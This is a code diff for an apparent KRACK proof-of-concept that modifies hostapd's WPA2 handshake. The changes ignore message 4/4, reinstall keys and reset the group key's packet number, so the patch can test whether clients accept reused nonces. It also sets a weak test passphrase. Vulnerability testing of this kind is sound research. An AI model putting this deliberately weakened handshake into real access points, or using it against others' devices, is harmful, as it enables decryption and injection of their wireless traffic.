PoC: krack-4way-test.py

hostapd/defconfig

@@ -31,7 +31,7 @@ CONFIG_DRIVER_NL80211=y
 #CONFIG_LIBNL20=y
 
 # Use libnl 3.2 libraries (if this is selected, CONFIG_LIBNL20 is ignored)
-#CONFIG_LIBNL32=y
+CONFIG_LIBNL32=y
 
 
 # Driver interface for FreeBSD net80211 layer (e.g., Atheros driver)

hostapd/dnsmasq.conf

@@ -0,0 +1,7 @@
+interface=wlan0
+dhcp-range=192.168.100.10,192.168.100.200,8h
+dhcp-option=3,192.168.100.1
+dhcp-option=6,192.168.100.1
+server=8.8.8.8
+log-queries
+log-dhcp

hostapd/hostapd.conf

@@ -5,7 +5,7 @@
 # management frames with the Host AP driver); wlan0 with many nl80211 drivers
 # Note: This attribute can be overridden by the values supplied with the '-i'
 # command line parameter.
-interface=wlan0
+interface=wlp0s20u1
 
 # In case of atheros and nl80211 driver interfaces, an additional
 # configuration parameter, bridge, may be used to notify hostapd if the
@@ -85,7 +85,7 @@ ctrl_interface_group=0
 ##### IEEE 802.11 related configuration #######################################
 
 # SSID to be used in IEEE 802.11 management frames
-ssid=test
+ssid=testnetwork
 # Alternative formats for configuring SSID
 # (double quoted string, hexdump, printf-escaped string)
 #ssid2="test"
@@ -1134,7 +1134,7 @@ own_ip_addr=127.0.0.1
 # and/or WPA2 (full IEEE 802.11i/RSN):
 # bit0 = WPA
 # bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
-#wpa=1
+wpa=2
 
 # WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
 # secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -1143,7 +1143,7 @@ own_ip_addr=127.0.0.1
 # wpa_psk (dot11RSNAConfigPSKValue)
 # wpa_passphrase (dot11RSNAConfigPSKPassPhrase)
 #wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
-#wpa_passphrase=secret passphrase
+wpa_passphrase=abcdefgh
 
 # Optionally, WPA PSKs can be read from a separate text file (containing list
 # of (PSK,MAC address) pairs. This allows more than one PSK to be configured.
@@ -1176,9 +1176,9 @@ own_ip_addr=127.0.0.1
 # TKIP will be used as the group cipher.
 # (dot11RSNAConfigPairwiseCiphersTable)
 # Pairwise cipher for WPA (v1) (default: TKIP)
-#wpa_pairwise=TKIP CCMP
+wpa_pairwise=CCMP
 # Pairwise cipher for RSN/WPA2 (default: use wpa_pairwise value)
-#rsn_pairwise=CCMP
+rsn_pairwise=CCMP
 
 # Time interval for rekeying GTK (broadcast/multicast encryption keys) in
 # seconds. (dot11RSNAConfigGroupRekeyTime)

src/ap/wpa_auth.c

@@ -5,6 +5,7 @@
  * This software may be distributed under the terms of the BSD license.
  * See README for more details.
  */
+#include <time.h>
 
 #include "utils/includes.h"
 
@@ -53,10 +54,10 @@ static void wpa_group_get(struct wpa_authenticator *wpa_auth,
 static void wpa_group_put(struct wpa_authenticator *wpa_auth,
 			  struct wpa_group *group);
 
-static const u32 dot11RSNAConfigGroupUpdateCount = 4;
-static const u32 dot11RSNAConfigPairwiseUpdateCount = 4;
-static const u32 eapol_key_timeout_first = 100; /* ms */
-static const u32 eapol_key_timeout_subseq = 1000; /* ms */
+static const u32 dot11RSNAConfigGroupUpdateCount = 4000;
+static const u32 dot11RSNAConfigPairwiseUpdateCount = 4000;
+static const u32 eapol_key_timeout_first = 2000; /* ms */
+static const u32 eapol_key_timeout_subseq = 2000; /* ms */
 static const u32 eapol_key_timeout_first_group = 500; /* ms */
 
 /* TODO: make these configurable */
@@ -163,6 +164,23 @@ static inline int wpa_auth_start_ampe(struct wpa_authenticator *wpa_auth,
 }
 #endif /* CONFIG_MESH */
 
+void poc_log(const u8 *clientmac, const char *format, ...)
+{
+	time_t rawtime;
+	struct tm *timeinfo;
+
+	va_list arg;
+	va_start(arg, format);
+
+	time(&rawtime);
+	timeinfo = localtime(&rawtime);
+	printf("[%02d:%02d:%02d] " MACSTR ": Hostapd: ", timeinfo->tm_hour,
+		timeinfo->tm_min, timeinfo->tm_sec, MAC2STR(clientmac));
+
+	vprintf(format, arg);
+
+	va_end(arg); 
+}
 
 int wpa_auth_for_each_sta(struct wpa_authenticator *wpa_auth,
 			  int (*cb)(struct wpa_state_machine *sm, void *ctx),
@@ -971,6 +989,15 @@ void wpa_receive(struct wpa_authenticator *wpa_auth,
 	} else if (key_data_length == 0) {
 		msg = PAIRWISE_4;
 		msgtxt = "4/4 Pairwise";
+
+		// Still mark connection as complete, so we do receive and accept encrypted data
+		if (sm->keycount <= 0) {
+			wpa_auth_set_eapol(sm->wpa_auth, sm->addr, WPA_EAPOL_authorized, 1);
+			sm->keycount = 1;
+		}
+
+		//poc_log(sm->addr, "Ignoring Msg4/4\n");
+		return;
 	} else {
 		msg = PAIRWISE_2;
 		msgtxt = "2/4 Pairwise";
@@ -2217,11 +2244,28 @@ SM_STATE(WPA_PTK, PTKINITNEGOTIATING)
 		return;
 	}
 
+	if (sm->TimeoutCtr > 1 && !sm->pairwise_set) {
+		poc_log(sm->addr, "already installing pairwise key\n");
+		enum wpa_alg alg = wpa_cipher_to_alg(sm->pairwise);
+		int klen = wpa_cipher_key_len(sm->pairwise);
+		if (wpa_auth_set_key(sm->wpa_auth, 0, alg, sm->addr, 0,
+				     sm->PTK.tk, klen)) {
+			wpa_sta_disconnect(sm->wpa_auth, sm->addr);
+			return;
+		}
+		sm->pairwise_set = TRUE;
+	}
+
+	// Reset transmit packet number of the group key, so we can detect if clients
+	// will accept re-used packet numbers (IVs) in broadcast data frames. Debug
+	// output is printed below.
+	wpa_group_config_group_keys(sm->wpa_auth, sm->group);
+
 	/* Send EAPOL(1, 1, 1, Pair, P, RSC, ANonce, MIC(PTK), RSNIE, [MDIE],
 	   GTK[GN], IGTK, [FTIE], [TIE * 2])
 	 */
 	os_memset(rsc, 0, WPA_KEY_RSC_LEN);
-	wpa_auth_get_seqnum(sm->wpa_auth, NULL, gsm->GN, rsc);
+	//wpa_auth_get_seqnum(sm->wpa_auth, NULL, gsm->GN, rsc);
 	/* If FT is used, wpa_auth->wpa_ie includes both RSNIE and MDIE */
 	wpa_ie = sm->wpa_auth->wpa_ie;
 	wpa_ie_len = sm->wpa_auth->wpa_ie_len;
@@ -2374,6 +2418,8 @@ SM_STATE(WPA_PTK, PTKINITNEGOTIATING)
 	}
 #endif /* CONFIG_P2P */
 
+	poc_log(sm->addr, "Resetting Tx IV of group key and sending Msg4/4\n");
+
 	wpa_send_eapol(sm->wpa_auth, sm,
 		       (secure ? WPA_KEY_INFO_SECURE : 0) | WPA_KEY_INFO_MIC |
 		       WPA_KEY_INFO_ACK | WPA_KEY_INFO_INSTALL |